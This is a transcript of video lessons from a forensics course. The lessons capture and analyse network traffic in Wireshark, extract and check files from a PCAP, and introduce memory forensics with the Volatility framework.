would we get out of that packet capture? Well, it turns out that packet captures are useful for a wide array of
things in our world. One thing that we can do through it is identify security threats. You can see what kind of
information is being transmitted over a network. You can also see what files are being transmitted over a
network. So if your computer is beaconing back to a command and control server, you can identify that
through a packet capture. If malicious files are being transferred over a network, you can also identify that via
packet capture. Or if you see communication that is out of the norm, that's anomalous, then that's also
something that we can see in a packet capture. So in that way, they help us identify security threats. They can
also help us identify data loss.
So if there is data that's supposed to be making it from one point to another and it's not getting there. Well, we
can kind of see by putting a packet capture at different points along the wire where data is being lost. And, of
course, the packet capture helps us perform forensics analysis which, in this video and course, is our primary
focus. We can take these packet captures, store them, and look at them at our leisure during an investigation to
try and find out what happened during an incident. So if we know that an incident happened in a certain
timeframe, we'll take the packet capture from that timeframe and try to start analyzing. And find out who was
talking to who, again, what files went over the network at that time. Where should we start pulling the strings
to try and further our investigation? Well, related to the idea of identifying data loss, packet captures can also
help us troubleshoot network issues.
If two machines should be able to communicate to each other and they can't, maybe there's a firewall issue. Or
that could be host or network-based firewall, or the intrusion detection system is blocking our net packets. Or
maybe the VLAN configuration on our switches is incorrect. There's a lot of reasons in a network why
communication could be disrupted, and the packet capture can help us investigate that and troubleshoot it. And
then, finally, identifying network congestion. If we're trying to perform load balancing and keep all of our
different communication lines somewhat equal, then it's a good idea to perform a packet capture. And find out
if one line has a significant higher traffic load than another one. I mentioned earlier that we can think about
packets like bundles of data. And within those bundles of data there are two main components. There's our
payload and our header. And there's a variety of different types of packet captures.
We can do a full packet capture where we capture the header and the payload. We could do a packet capture
where we only capture the header. So we can tune it how we want to, depending on how much data that we
want to store. Capturing the header and payload takes up more storage space but provides more information.
Doing a packet capture on just the header is more efficient from a storage and CPU usage point of view, but it
doesn't provide as much information. Now what is contained in these two different parts of our data? Well, the
header contains all of the metadata associated with the packet. So this is going to be things like source IP
address, destination IP address, source port, destination port. All of the information that the packet and the
processors need to know to get the information from one computer to another. And the payload is the actual
information that's being transmitted. Now oftentimes our payload is encrypted.
So, for example, in the case of HTTPS communication, we have encrypted payload information, which is not
going to be as valuable to us because we can't inspect it as easily. But if it's unencrypted transmission like
HTTP transmission, well, then it's very valuable to get the payload because we can go in there and see exactly
what is being talked about. When we're doing a packet capture, there are two ways that we can do it as well.
We can either do an inline packet capture where we have a physical or a virtual device that's put directly on the
line, so all communication has to go through it in order to continue. Or we could have a mirror port set up on
something like a network switch that copies out the data that's going through it and sends a copy of that data
out to our packet capturing device. And that would be an out-of-band sort of way of doing a packet capture.
Once our packet capture is complete and we have our data stored in a PCAP file of some sort, our next step is
to perform an analysis in that packet capture.
We do this using a packet analysis tool. The most common, widely-used one is called Wireshark. It's a free
tool and it is extremely powerful when it comes to performing packet analysis.
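To make the full-capture versus header-only trade-off concrete, here is a hedged sketch using tcpdump, a common command-line capture tool; the interface and file names are placeholders:

  tcpdump -i eth0 -w full.pcap                 # full packet capture: headers plus payload
  tcpdump -i eth0 -s 96 -w headers-only.pcap   # a snaplen of 96 bytes keeps roughly the headers and drops most of the payload

Either .pcap file can then be opened in Wireshark for analysis. The exact snaplen needed to cover the headers depends on the protocols in use, so treat the value shown as illustrative.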
Objectives
[Video description begins] Topic title: Network Forensics. Your host for this session is Peter Adamson. [Video
description ends]
Now let's get an overview of network forensics and network vulnerabilities. What do we mean when we talk
about network forensics? Well, it's a broad field and a broad definition. But a major part of network forensics
is the identification, capturing, and analysis of network events, which is done to discover the source of network
security incidents and vulnerabilities. So what this means is in a typical network, there's communication
traveling between all computers on the network. So computer A to B, computer B to C, computer A to C, and
vice versa, they're constantly talking back and forth to each other. So we are trying to identify, capture and
analyze that communication pattern and find out what's happening from a security point of view.
And this sounds pretty simple in theory, we just capture the communication and look at it and we should be
able to see what's going on. Unfortunately, when it actually comes to trying to implement this, the complexities
build up really quickly. First off, you need to be very familiar with some complex and powerful packet capture
and analysis tools. You have to have a good understanding of the infrastructure of the network that you're
monitoring so that you know, where you should be capturing packets? How many packets you should be
capturing? What devices you're interested in? What kind of communication you're interested in? How much of
the communication you're looking at is encrypted? If it's encrypted, can you still get something from the
payload?
How to extract files out of the communication. And that's just scratching the surface. So very, very quickly,
this packet capture and analysis for network forensics becomes quite complex. Something you may have heard
me mention there was how much of this data do we capture? And the reason I brought that point up is because
unless your network is extremely small consisting of only a couple devices, which very few networks that
you'll be doing a security investigation on are, it's not feasible to capture all network data traveling within a
network. There's just too much of it. It's overwhelming. Any kind of relevant incident or relevant information
is going to get lost in the sea of data that's just going to be totally impossible to search through. So it's
important to have an idea of what kind of data you want to capture.
Now this might mean something like, I'm only interested in HTTPS traffic on this network or I'm only
interested in FTP traffic. So you could narrow it down with the protocol, or I'm only interested in this subset of
IP addresses. So maybe you're only looking at hosts on the 192.168.1.0/24 subnet. Because otherwise,
you're just not going to be able to look at the data. And the storage space as well becomes rapidly filled up
when you're capturing all this data. The size of your packet captures becomes very large very quickly, so you
also run out of places to put the PCAP data. And then it takes longer to load that PCAP data into your analysis
tools, which means it's going to take that much longer to start doing anything. And it just becomes a hassle. So
it's very important to pinpoint exactly what you want to be capturing before you start your capture.
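As an illustration of narrowing a capture before it starts, capture filters can be applied at collection time. This is a hedged sketch using tcpdump's Berkeley Packet Filter syntax; the protocol, subnet, and interface are examples only:

  tcpdump -i eth0 -w web-traffic.pcap 'tcp port 443 and net 192.168.1.0/24'
  # captures only TCP traffic on port 443 to or from the 192.168.1.0/24 subnet

Wireshark accepts the same capture-filter syntax when you start a capture, which keeps the resulting PCAP focused and the storage requirements manageable.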
And that's because, at the end of the day, when it comes to network forensics, packet captures are often the backbone of our investigation, helping to preserve the data for future analysis. We can come back to these
packet captures time and time again, looking for different aspects of our investigation. Try and go back and
find maybe something we missed on the first go around. Or something we find later down the road triggers us
to say, maybe this is something we should go back and look for in the packet capture. So it serves as persistent
evidence for us to keep going back to as a reference. And that's why it's important that our packet capture is
focused on the relevant things, because we have to be able to come back to it and know how to
efficiently come back to that packet capture to find exactly what we want.
We can also use these packet captures to identify vulnerabilities in a network that have already been taken advantage of, where we're trying to go back and find out which vulnerabilities were used to instigate an attack, or to identify vulnerabilities that could be used in the future to instigate an attack. And so we have two types
of vulnerabilities. We have our internal network vulnerabilities, and these are more focused around the
architecture of your network. So these vulnerabilities are from the point of view of where could something go
wrong from inside your network. So something like a bottleneck, where a large amount of traffic is potentially flowing through a single point and you're actually getting a slowdown in your bandwidth. These vulnerabilities also deal
with authenticated users and what they could do in a network, how they could traverse it once they've got these
kind of authentications.
And our second kind that we can see from a packet capture is external network vulnerabilities. So these are
going to be vulnerabilities that could be found from your external facing devices. So things like your network
firewalls, your intrusion detection systems, or any device that's externally facing that might have some ports
open. So an example of this would be a DDoS attack. If you have a web server open to the world and you don't have sufficient protection, well, you could have a vulnerability there, too: a distributed denial of service. So looking at our packet capture and our packet analysis can help us identify these vulnerabilities.
Objectives
[Video description begins] Topic title: Capturing Network Traffic. Your host for this session is Peter
Adamson. [Video description ends]
In this video, we're going to demonstrate performing a packet capture, in order to gain intelligence from a
potential cyber attack. So for our purposes in this demonstration, let's pretend that the computer I'm currently
on, we suspect it's been compromised. There has been a piece of malware that's made its way into our system,
and we want to know what it's doing.
[Video description begins] A Kali Linux Desktop screen displays. It contains various files and folders. [Video
description ends]
In order to do that, we are going to perform a packet capture. And what that is going to let us do is see who is
talking to this computer, and who this computer's talking to. And then from there, we're going to be able to
analyze that packet capture, and find out if anything out of the ordinary or malicious is going on.
[Video description begins] He selects the wireshark option from the Start menu. A dialog box titled,
Authenticate displays. It contains some text and a field titled: Password. The Cancel and Authenticate buttons
display at the bottom. He enters the Password and selects the Authenticate button. [Video description ends]
And Wireshark is going to allow us to look at the network traffic going into and out of our machine.
[Video description begins] The Wireshark Network Analyzer window displays. The menu bar contains the
following options, including: File, Edit, View, Analyze and Statistics. The toolbar beneath the menu bar
contains the following options, including: capture options, start a new live capture, stop the running live
capture and restart the running live. A search bar to Apply a display Filter displays underneath the toolbar.
The windows pane contains two sections, namely: Capture and Learn. [Video description ends]
So the first thing that we need to do when we start a packet capture is find out what interface we want to do
that on. So in order to do that, I can do something like ip address.
[Video description begins] The blank terminal window displays. The menu bar contains the following options,
including: File, Actions, View and Help. [Video description ends]
[Video description begins] He enters the command ip address. [Video description ends]
and look at your networking. What you're looking for is the interface that has an IP address configured. So in our case, it's this interface right here, eth0; it has 10.0.2.15 configured.
[Video description begins] He highlights the second interface with name eth0. [Video description ends]
Which means this is our interface that's communicating with the internet. Most of the time, this is what you're
going to want, sometimes in edge cases, there might be other interfaces that you want. But for our purposes
right now, we want this interface. So now that we know our interface, we can select eth0.
[Video description begins] He closes the terminal window. The Wireshark Network Analyzer window displays.
He selects the option: eth0 which is present under the Capture section. [Video description ends]
So I'm going to double-click on that, and now we are starting a packet capture on eth0.
[Video description begins] The screen titled: Capturing from eth0 displays. The menu bar contains the
following options, including: File, Edit, View, Analyze and Statistics. The toolbar beneath the menu bar
contains the following options, including: capture options, start a new live capture, stop the running live
capture and restart the running live. The windows pane is divided into three horizontal sections. The first
section contains a table with the following column-headers, namely: No., Time, Source, Destination, Protocol,
Length and Info. [Video description ends]
Right now you're not seeing any packets coming in. On a normal machine you'd see a lot more traffic going in
and out, because machines are pretty chatty in general. They're always communicating with various different
DNS servers, time servers, name resolutions, those kind of things. But because I'm on a virtual machine right
now, I don't have a lot of traffic going in. So what I'll do is I'll go and generate a little bit of traffic just by
browsing the internet. So if we start up a browser here, and boot into it,
[Video description begins] He opens the Firefox browser. [Video description ends]
and we start to browse around. Let's go over to Google, and we'll do a search for Wireshark. And then we'll go
in and say, packet capture. Then we should have generated traffic here, which we did.
[Video description begins] The corresponding browser search traffic displays in the Capturing from eth0
window. [Video description ends]
So now you can see, we've populated our packet capture with information. So what are we looking at here?
Well, there's three different sections to our screen. Up here, we have a list of every packet that's been captured
during our session. What we'll do now is we'll pause the packet capture, so now we've stopped our capture. In
here, we have a list of every packet that we have captured during our session. And we get information, it's got
a number, the time that it came in from the start of our packet capture, the source ip address, the destination ip
address. So we can see here, this is coming from external to us, whereas this is starting from us going to
external. Because the source is our IP address, and here the destination is our IP address. We can see what kind
of protocol they've been using.
So here it's been all TCP, along with the bit length and some information about what's going on. So here it's been an ACK; here, these are all Keep-Alive ACKs. We can try and find something a little more interesting; here's just application data. So this is where we start to get some information. Now, if we see a communication
out of the norm, let's assume for our purposes it's this address right here, 23.64.57.215. We could pretend that that is a command and control server that a piece of malware is communicating with. It's not, but let's pretend that it is. So we would look at our packet capture and say that's suspicious. Why are we communicating with that server? So what we can do is click on that and open up a window,
[Video description begins] A window titled: Wireshark.Packet 3984.eth0 appears. It is divided into two
horizontal sections [Video description ends]
and these two panes here are the same as the bottom two panes of the main capture window.
[Video description begins] The two sections of the Wireshark.Packet 3984.eth0 window are similar to the
bottom two sections of the Capturing from eth0 window. [Video description ends]
[Video description begins] He explains the options present in the first section. [Video description ends]
So this is where we can see all the different layers of the network communication protocols coming into play.
So we have our frame information here, telling us various information about when it arrived. And then we can
go into our Ethernet layer, and look at the destination and source information on our protocol. Then we can go
into the Internet Protocol Layer, we're using IP Version 4. We can see our source is our local machine, and our
destination is our pretend command and control server. And then we can get various information about what
flags have been set. The source destination again, header checksums, the checksum status. Then we can go to
our TCP layer and get even more information about the source port. Though the source port tends to be
random, you don't get a lot of information about that. But we can get information about destination port, so
here it's 443, which is HTTPS.
There's more information here too, such as window size. And oftentimes you can look in here and see if it's a custom-made protocol, or if it's an attack attempting to craft a malformed packet. You can go in here and see information that might look out of the norm. There are various attacks that use fields like the Window size value, and you could get indicators out of that. And then we can look at the TLS layer, and see the Encrypted Application
Data. And then down here in the bottom, we have the x information about the actual protocol that we've
captured. And on the right is the ASCII interpretation of that byte data.
So you might see interesting information here; right now there's not much that we can get out of it. But sometimes you can actually see information relevant to what you're trying to decipher here. So we'll close that.
So this is how we would go about capturing the network information on a machine that we suspect of being compromised. Now, the last thing that we want to be able to do is save this data for future use. If we are
using this for forensics, then there's a good chance that we're going to want to come back to this time and time
again, and keep looking at this network communication. So in order to save this for persistent use, we're going
to go up here and click Save As.
[Video description begins] He selects the File option from the menu bar. A context menu appears. It contains
the following options, including: Open, Open Recent, Close, Save and Save As. He selects the option Save As.
The Save explorer window displays. [Video description ends]
[Video description begins] The blank terminal window displays. [Video description ends]
[Video description begins] He enters the command: cd Desktop/. [Video description ends]
[Video description begins] He enters the command: sudo wireshark malicious.pcap. [Video description ends]
So this is how we could transfer across to a different forensics team as well, or other security analysts and say
here's the information. What do you see out of this? And continue our investigation from there.
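As a follow-on to this demonstration, once the capture is saved you can quickly isolate traffic involving a suspicious address. This is a hedged sketch; the file name and IP address come from the pretend scenario in this video:

  tshark -r malicious.pcap -Y 'ip.addr == 23.64.57.215'
  # reads the saved capture and prints only packets to or from the suspected command and control address

The same expression can be typed into Wireshark's display filter bar to get the equivalent filtered view in the GUI.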
Objectives
illustrate how to reconstruct artifacts and files from a PCAP file using Wireshark
[Video description begins] Topic title: Working With PCAP Files. Your host for this session is Peter
Adamson. [Video description ends]
[Video description begins] The Kali Linux Desktop screen displays. [Video description ends]
In this video, we're going to demonstrate how to reconstruct artifacts from a PCAP file. So we're going to use Wireshark for this example, and you can see here on the
desktop I have this existing packet capture, example.pcap. So this is what we're going to use to reconstruct the
packet capture and examine for forensic analysis. So what we're going to do is open up this packet capture in
Wireshark, so I'm going to open it up.
[Video description begins] The blank terminal window displays. [Video description ends]
[Video description begins] He enters the command: sudo wireshark example.pcap. The next line prompts for
the password. He enters the password. [Video description ends]
And you can see we've reconstructed the packet capture now and
[Video description begins] The window titled: example.pcap displays. [Video description ends]
we can start to do our analysis. So looking through, we can see we have a lot of different protocols in this
packet capture, we've got some DHCP, DNS, NBNS. If we go down here, we've got some TCP and then a lot
of TCP traffic at the bottom. So we want to start to investigate this packet capture to try and extract
information out of it, try and get objects, see what transpired here.
So the first thing that we can do is, let's go to a TCP packet. I just picked one at random here, where the source
is 107.180.50.162. The destination is 10.6.27.102. And one thing that we can do in Wireshark is to follow the
TCP stream.
[Video description begins] He right clicks on the 107.180.50.162 Source. A context menu appears. He selects
the Follow option. A context sub menu appears. He selects the option TCP Stream. [Video description ends]
So if I right-click and go to Follow TCP Stream, this is going to try to reconstruct the conversation for us that
went on.
[Video description begins] A window titled: Wireshark .Follow TCP Stream(tcp.stream eq1).example.pcap
displays. It contains various details. [Video description ends]
So we can see here, this is the entire conversation that happened between these two IP addresses. So we can
see up here, here's the get request. And you can actually see as I clicked on it, it shows you which packet this
came from. So here, this GET request came from this packet 71. Then the next communication came from
packet 73. And we can see here's the HTTP header. And then we can see all of this traffic here,
[Video description begins] He scrolls down in the window. [Video description ends]
We can't really get much information out of it, but we can still follow the whole conversation. Then we go
down here to the bottom. And so that's what we've gotten out of that. Sometimes if this is unencrypted
transmission, you can actually read the payload directly here and that could be extremely valuable. Sometimes
you'll get information like people's names, passwords, various confidential information that might be
transmitted incorrectly. Now we can see that after I've right clicked and followed the TCP stream, I've actually
applied a filter up here, TCP stream equals 1. So I'm only seeing packets related to that TCP stream now. So
I'm going to remove that filter so that we can go back to the main view. Now I've got no filter applied, and we're
back on the main packet capture. So that's the first thing that we can do. Now, the other thing that we can do is
try to start to extract objects out of this file.
In order to do that, we want to use an unencrypted transmission, because otherwise we're not really going to be
able to get the file out. So, in this case I'm going to use HTTP as a filter. So now I've filtered on HTTP because
it's an unencrypted transmission. And now that I've filtered on HTTP, what I can do is try and see if any files
were actually transmitted over this conversation. So I'm going to say File Export Objects HTTP.
[Video description begins] He selects the File option from the menu bar. A context menu appears. He selects
the option: Export Objects. A context sub menu appears. The context sub menu contains the following options,
namely: DICOM, HTTP, IMF, SMB and TFTP. He selects the option: HTTP from the context sub
menu. [Video description ends]
[Video description begins] A window titled: Wireshark.Export.HTTP object list appears. It contains the data
in tabular form having the following column headers, namely: Packet, Hostname, Content Type, Size and
Filename. The tabular list contains three items with Packet name as: 45, 337 and 1456. The Save, Save All,
Close and Help buttons display at the bottom. [Video description ends]
And here, I actually have a list of all the files that were transmitted during this conversation. So we can see
we've got this packet, 45, came from this host name msftncsi.com. The content type is just plain text, 14 bytes.
And the file name is ncsi.txt. And then we have another one which transmitted a Microsoft Word document, named Invoice&MSO-Request. And then we have an x-msdownload, which is an executable here, knr.exe.
So we can actually save these files from within Wireshark. So I'm going to save them here. And you can see we've got them now on our desktop.
[Video description begins] The Kali Linux Desktop screen displays. [Video description ends]
So out of that PCAP, we've actually extracted these three files. So let's open them up and see what they say,
okay?
[Video description begins] He opens the ncsi.txt file. The Notepad window displays. The menu bar contains the
following options, namely: File, Edit, Search, View, Document and Help. The content pane displays the
following content that reads: Microsoft NCSI. [Video description ends]
This one says, just Microsoft NCSI, which we can see, we've got the file, we have this invoice request,
[Video description begins] He selects the Invoice&MSO-Request.doc file. A dialog box titled: Open With
displays. [Video description ends]
which is a Microsoft Word document. Now something to be wary of here: oftentimes when we're extracting files or artifacts from a PCAP, it's because we are investigating a compromise or a malicious attack. So we need to be careful, because there's a good chance that these are malicious files. So it's a
good idea that you are always doing this in an isolated environment. At a minimum you should be on a secure
virtual machine. And taking all possible other steps to secure your environment before you start to tackle these
files.
And then you need to do your due diligence with the files once they're opened.
[Video description begins] The terminal window displays. He enters the command: cd Desktop. [Video
description ends]
So what we can do is actually check the files now that we've got them, and make sure that they are what they say they are.
[Video description begins] He enters the command: ls. The output displays the list of files and directories in
the desktop. [Video description ends]
So on Linux, we have this utility called file, and we can use it to check the actual information behind the file to make sure it is what we think it is to start off with.
[Video description begins] He enters the command: file Invoice\&MSO-Request.doc. The output displays the
files details. [Video description ends]
So we can see that this is a Windows file; the name of the creating application is Microsoft Office Word. So we actually do have a Word file here. You can't just trust that it says .doc; that could be anything trying to obfuscate itself. Similarly, we can check the other file, and okay, this is an executable for Windows.
[Video description begins] He enters the command: file knr.exe. The output displays the file details. [Video
description ends]
Now the next thing that we could do is check the md5sum
[Video description begins] He enters the command: md5sum Invoice\&MSO-Request.doc. The output displays
corresponding details. [Video description ends]
And we could take this sum, both of these sums, either of them, and we could go to something like VirusTotal.
[Video description begins] The Firefox browser screen displays. He searches and opens VirusTotal website. A
page titled: VirusTotal displays. The content pane contains three tabs, namely: FILE, URL and SEARCH. He
selects the SEARCH tab. It contains a search bar to find URL, IP, domain, or file hash. [Video description
ends]
And in VirusTotal, we can actually put in this file hash that we just got.
[Video description begins] He copies the sha256sum Invoice\&MSO-Request.doc file hash into the search bar. He hits the Enter button. [Video description ends]
And see if it comes back with anything malicious. And we can see well, it certainly seems like this is
malicious. 38 engines have detected this file, and it looks to be a Trojan of some sort.
[Video description begins] The screen displays the scan results. The content pane contains the following tabs,
namely: DETECTION, DETAILS, BEHAVIOR and COMMUNITY. Currently, the DETECTION tab is
selected. [Video description ends]
So here, the odds are good that we've detected a malicious file in this transfer. So now if we go back to Wireshark, we can close this and I'll get rid of the filter.
So we're back to the main communication. We do have other options when we're exporting objects. So we can
see we've got DICOM, IMF, SMB, TFTP.
So when we're going through and analyzing these PCAPs, we should always make sure that we get full coverage and check to extract as many of these objects as we can. The more artifacts and objects we can extract from a PCAP, the more efficient our investigation will be, and the more likely we are to be able to track
down any kind of malicious attack from a source perspective.
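For readers who prefer to script this workflow, here is a hedged sketch of the same extraction and verification steps from the command line, assuming tshark (the command-line counterpart to Wireshark) is installed; file names match the example shown in this video:

  mkdir -p exported
  tshark -r example.pcap --export-objects http,exported   # pull HTTP objects out of the capture
  tshark -r example.pcap -q -z follow,tcp,ascii,1         # print the reassembled contents of TCP stream 1
  file exported/*                                         # confirm the true file types of the extracted objects
  sha256sum exported/*                                    # hash the files so they can be looked up on VirusTotal

As in the demonstration, do this only inside an isolated environment, since the extracted objects may well be malicious.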
define volatile data and identify the possible data contained within
[Video description begins] Topic title: Volatile Data. Your host for this session is Peter Adamson. [Video
description ends]
Let's talk about volatile data and what kind of information is contained in volatile data, and then how that
information is useful to us from a forensics point of view. So volatile data is data that is stored in your
computer's short-term memory. It's there and stored while your computer is running, but as soon as it's turned
off, the data is wiped. So your RAM is an example of volatile data. Some examples of volatile data, things like
your browsing history, chat messages, passwords. These are all types of data that could be stored, and are
frequently stored in your RAM or volatile data. So they exist as a temporary cache in your short-term storage,
and then they're wiped once your computer is turned off.
So how do forensics and investigations differ when we're dealing with persistent data such as on a hard drive
versus volatile data such as in our short-term memory? Well, the hard drive, we can really access those files at
any time. They're persistent, it doesn't matter if the computer turns off and then turns on again, they'll still be
there. It's more of an after-the-fact investigation when we're dealing with a hard drive. We're going in to try to find whether there are any footprints left over from a potential attack, any files that may not have been cleaned up.
Whereas with short-term memory, it's a more time-sensitive investigation. We have a limited time window to grab
that memory capture before it's wiped. If the computer is turned off, we lose that state of the memory at that
time. So when we're dealing with memory forensics, you can think of it more like a live investigation. We're
still capturing the memory with a memory capture and investigating it later.
But we're looking at a live state of the computer as it was when that memory capture was taken. So from the
memory, we can kind of see how potential malware was actually running, what it was affecting in that system
at that time. And we call this part of our investigation memory forensics, which is identifying evidence not
located on a hard drive or in persistent memory. So our goal here is very much centered on trying to find any
kind of trace or footprint of malware that might be leftover. Because malware does do a very good job usually
of cleaning itself up from logs and making sure that any files are not left behind. So oftentimes, this is a good
place to go looking for that kind of information. So what are we getting out of these memory dumps? What is
the value coming back to us as forensic investigators? Well, we can, through the analysis of a memory dump,
identify the cause of an incident. And this is especially valuable if we have multiple memory captures from a
machine.
So what we can do oftentimes is if we have a sample piece of malware, we could deploy it into a test lab. And
before we deploy the malware, we take a baseline memory capture of the uninfected machine. And then we
deploy the malware and take another memory capture of the infected machine. And this can help us build up a
signature or an image in our minds of how this malware behaves. So by seeing what a system looks like before
and after, we start to learn how this malware behaves and changes the system. And then we can apply that
knowledge and go into other memory captures, and start to try to find out what the root cause of an incident
was. We can say this flag or this piece, this part of the memory is behaving weirdly. I've seen that before, this
is what caused the incident. And it also helps us to identify recent computer activity.
There may be activity that happened on the computer that wasn't logged or nothing persistent came of it. The
user was on there or a file was on there but nothing else new was saved or actually logged to the hard drive.
And so we can go in and see what people have been doing on this machine. Some of the more common types of data we'll pull out of memory are things like network connections, open ports, and active connections to and from a machine, which can be logged and found in memory and are very useful for finding out whether a piece of fileless malware is beaconing back to a command and control server. And when I say fileless malware, that's what fileless malware
means, it's running in the memory, it's not persistent on the hard drive. We can also find account credentials
that have been used and have been cached in the memory which can be very useful to us. The processes that
are running at the time of the memory capture. So we have a full list of all the processes that are there. We can
see where those processors are listed and try to find out have any these processes been trying to hide
themselves?
Do any of them look malicious? And then the encryption keys might also be stored in the memory, which can
maybe help us to look at potentially encrypted malicious data. And in today's world, these stealth attacks using
fileless malware are becoming increasingly common. It's a very popular attack vector simply because it is
much more difficult to detect. So from an attacker's point of view, they're less likely to be caught using these
techniques. Things like firewalls, antiviruses, and intrusion detection systems are not going to catch these kinds
of fileless attacks. So that's why it's very important to have this skill set available to you to be able to perform
these memory forensics to try and detect this attack vector. And the reason that our traditional security systems
won't detect these attacks is they're just not built for it usually.
They are designed to look more at your persistent storage and to look at network traffic in the case of an
intrusion detection system on the network. They're not designed to go into your running memory and probe it
to see what's going on there. But more advanced enterprise security systems do have this kind of memory
forensics built-in, it's not that they don't exist, they are there. But you will have to make sure that the tool that
you're using does have that forensics capability.
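As a concrete illustration of the baselining idea described a moment ago, a minimal workflow could look like the following sketch. It assumes Volatility 2.x is available as the volatility command (or the standalone binary used later in this course), that the two captures are named baseline.vmem and infected.vmem, and that the profile Win7SP1x64 matches the machine; all of those names are illustrative rather than taken from a real case.

# Process listing from the clean capture and from the infected capture
volatility -f baseline.vmem --profile=Win7SP1x64 pslist > baseline_pslist.txt
volatility -f infected.vmem --profile=Win7SP1x64 pslist > infected_pslist.txt

# Anything that appears only in the infected listing is a candidate for closer inspection
diff baseline_pslist.txt infected_pslist.txt

The same before-and-after comparison can be repeated for network connections or loaded modules to build up that picture of how the sample changes a system.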
Objectives
[Video description begins] Topic title: Memory Forensics Tools. Your host for this session is Peter
Adamson. [Video description ends]
Now let's talk about some of the tools and techniques that are available to us to conduct an analysis of a
computer's memory. And it's important because the memory is going to include key evidence. So we really
want to have a good idea of how we're going to go about collecting it. And the way that we collect it is going
to be a little different in every case. It's going to depend on the operating system that we're trying to collect
memory from, what kind of network we're collecting it from, and what we have available to us at the time.
And when we're doing these forensics, oftentimes what we're trying to do is prove or disprove that something
happened or did not happen. So we might be going in to prove that a certain machine was compromised, or to
prove that a machine was not compromised.
And in order to do this, we have to have a clear understanding of what our goals are, what kind of information
we're going to be gathering, and how we're going to go about doing that. So the first thing that we want to do is
look at our target systems and identify recent user activity. This is really good from the point of view of
finding out what's been tampered with on the machine. And from an attribution point of view, it's a starting
point. Now just because a machine tells you that a user has done something, it doesn't mean that the person in
the real world associated with that user account is the one who has performed that action. Somebody could
have commandeered that account and done something on behalf of that user without their knowledge, but it is
a starting point. We can at least identify this user did this malicious activity. And from there, we keep pulling
the thread and trying to go deeper and gather more evidence for our case.
So then we're going to start to look for things like malware. We're going to look in the running process lists
and find out if any of these processes have tried to hide themselves or cover up their tracks. Are there processes
that are running that shouldn't be, or are they trying to inject themselves into another running process? We
look for that kind of thing to find out what is on the machine. So that's going to be our unusual processes. And
then we're also looking for any kind of communication patterns. Are there processes that have made use of
open ports or opened ports themselves on the machine? Have they tried to create a reverse listener, such as a reverse TCP
shell, or tried to beacon out to a command and control center? So these are the next pieces of evidence that
we're going to try and gather. When we're dealing with these different kinds of memory dumps and memory
captures, there are a lot of different formats that they'll come in that we can feed into our tools. So we need to
be familiar with what file format we are expecting in order to know what kind of tool to use and how to
handle that file format.
There's more than what we're going to talk about here, but these are some of the most common ones. So there's
your raw format, which is one of the most common ones. This is generally what you'll receive when you
capture memory off of a live machine that is currently running and you take a memory capture from it. Then
there's a crash dump. This is generally taken by the operating system. And it happens when the operating
system or computer crashes and the machine will dump out the volatile memory to this kind of file. There's a
page file. This is usually associated with something like virtual memory and it's actually stored on the hard
drive but it's still volatile data. There's a hibernation file. So when you put your computer into hibernation, this
is a copy of the volatile memory state, saved by the operating system to allow it to restore its state to what it was before
the hibernation was initiated.
And then there's virtual machine snapshots. So when you have a virtual machine, you can take a snapshot,
either with its memory as in the running state or the turned-off state. And these snapshots can be used as a
form of volatile memory to analyze as well. And when it comes to memory acquisition tools for either
capturing or analyzing volatile memory, there are lots and lots of different options available in the market,
whether they're free or commercial. But we're going to talk about some of the more common ones. So the first
one I'm going to talk about is Volatility Suite. This is very, very common; you will almost always hear
Volatility in the same discussion as memory analysis. And that's because it's very, very useful. It's an extremely
powerful tool, it's free and open source. It runs on all your standard operating systems, Windows, Linux, Mac.
It's primarily built to analyze your memory. It's not designed to help you take the memory capture itself. But it
has the capability to analyze raw memory files, crash dumps, and VMware or VirtualBox snapshots and checkpoints,
so your virtual machine memory. Very, very useful and a very good tool to have in your tool belt. Another one
is Rekall. This is more of an end-to-end solution. It's really, really good for incident responders and forensic
investigators. And that's because it has both acquisition and analysis tools. So this will help you take your
memory capture as well as analyze it in the same tool. Another nice tool is Helix ISO. And the advantage of
this tool is that it's designed to be loaded up onto a bootable live CD or USB. And you can plug it into a target
system to help you take the memory capture.
So it's nice to be able to take these memory captures externally without having to interact directly with the
target machines. Belkasoft RAM Capturer is another forensic tool that we can use to capture volatile memory
and save it to a file. And it is again a suite of tools that has a wide range of functionality. And finally, the last
tool that I'm going to mention is Process Hacker. And this tool is designed specifically to monitor running
applications on a machine. It's open source and it can be really nice to help augment a memory capture to give
you an idea of what is running on the machine at a certain time.
Objectives
demonstrate how to use the Volatility Framework to process an extraction of computer memory
[Video description begins] Topic title: Using the Volatility Framework. Your host for this session is Peter
Adamson. [Video description ends]
[Video description begins] The terminal window displays. It displays the following folder path:
/Desktop/volatility_2.6_lin64_standalone. [Video description ends]
In this video, we are going to demonstrate diving into and analyzing captured memory from a machine using
Volatility. Volatility is a free memory analysis framework, it's extremely powerful. It can be run on Mac,
Windows, Linux. In this example, we're going to be running it on a Linux system, in this case, my Kali Linux.
I've downloaded the standalone executable that can run on its own. There are other ways you can use Volatility; you can
install it directly onto a system so you can actually use volatility as a command. But in this case, we're just
going to be using our standalone executable and running that when we do our commands.
So when we perform digital forensics, one of the key indicators for us, or the key pieces of evidence, will be
capturing the running memory of a potentially infected machine. So we'll go in there and take the RAM as it is
in its current state and freeze it, save it into a file so that we can try and analyze it later. Oftentimes when we
do that, it's very helpful to note what kind of operating system the memory came from. So are we taking
this from a Windows 10 device, an Ubuntu machine, or a Mac? That kind of thing can help our
digital forensics a lot because then we know exactly where we are. But in this case, we're going to pretend like
we just have a sample piece of memory and we have to try to find out as much as we can about it without any
information.
So if I were to go to my terminal here and do a list, we can see here I have my Volatility standalone,
[Video description begins] He enters the command: ls. The output displays the list of files and directories
inside a folder. [Video description ends]
which is what I'm going to be using today to analyze our memory. And right here, we have our example virtual
memory file. So this is the file. This is the memory capture that's been taken off the machine we are going to
try to look at today. So to use Volatility, the first thing that we're going to do is use the Volatility standalone
and use -h. This command will give us a list of all the commands that Volatility makes available to us, and will
give us a general idea of how to use the program.
[Video description begins] The command reads: ./volatility_2.6_lin64_standalone -h. [Video description ends]
So you can see it's giving us an output of all the different commands that we have available to us. Here are the
different options that we can do. And here are the plugin commands.
Now we're not going to go through every command today but we're going to go through some of the big
important ones. And the first one that we're going to look at is this one right here, imageinfo. And you can see
beside it, it says identify information for the image. When we're going into a memory capture without any kind
of information about it, this is a really good starting point, because hopefully it can tell us
what operating system this came from and where to start looking next. So in order to do that, we are going to say
that we're going to run the standalone. We're going to use -f to point to our memory file. And then at the
end, we're going to say imageinfo.
